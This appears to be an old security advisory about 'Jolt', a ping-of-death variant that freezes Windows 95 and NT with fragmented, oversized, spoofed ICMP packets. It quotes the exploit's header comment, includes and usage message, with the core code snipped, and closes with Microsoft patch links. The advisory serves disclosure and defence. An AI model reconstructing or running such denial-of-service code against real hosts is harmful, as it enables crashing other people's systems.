COMMAND
ping
SYSTEMS AFFECTED
Win '95, NT
PROBLEM
For those who are collectors of these stuff, especially of so
called 'Ping of Death', here come another variation. Original
exploit follows.
/* Jolt 1.0 (c) 1997 by Jeff w. Roberson
* Please, if you use my code give me credit. Also, if i was the
* first to find this glitch, please give me credit. Thats all i
* ask.
* Ok so all this does is build a really fraggmented over sized
* packet and once win95 gets it, and puts it back together it
* locks. I send multiple packets by default cause some times it
* takes a few packets to totally freeze the host. Maybe its
* spending processor time to figure out how to put them back
* together? I've had reports of people blue screening from it
* tho so we'll let Microsoft's boys figure out exactly what this
* does to 95. As of now i haven't tested it on NT, but maybe i
* will later ;). All of this source wasn't origonally written
* by me I just took one of the old programs to kill POSIX and
* SYSV based systems and worked on it abit, then made it spoof
* =). VallaH (yaway@hotmail.com)
* Update: It apears to work on some older versions of mac os
*/
/* Yah this is for linux, but i like the BSD ip header better then linux's */
#define __BSD_SOURCE
#include stdio.h
#include sys/types.h
#include sys/socket.h
#include netdb.h
#include netinet/in.h
#include netinet/in_systm.h
#include netinet/ip.h
#include netinet/ip_icmp.h
#include string.h
#include arpa/inet.h
[snip...]
if (argc < 3) {
printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!) glitch by VallaH (yaway@hotmail.com)\n");
printf("\nusage: %s [number]\n",argv[0]);
printf("\tdstaddr is the host your attacking\n");
printf("\tsaddr is the host your spoofing from\n");
printf("\tNumber is the number of packets to send, 5 is the default\n");
printf("\nNOTE: This is based on a bug that used to affect POSIX complient, and SYSV \n\t systems so its nothing new..\n");
printf("\nGreets to Bill Gates! How do ya like this one? :-)\n");
exit(1);
}
[snip...]
SOLUTION
Stopping the Ping of Death is not so hard, just install the latest
Service Packs or updates, depending on what Windows operating
system you're running.
Windows NT 4.0
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/
Windows NT 3.51
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt351/
Windows 95
http://www.microsoft.com/windows/common/contentW95UGA.htm
|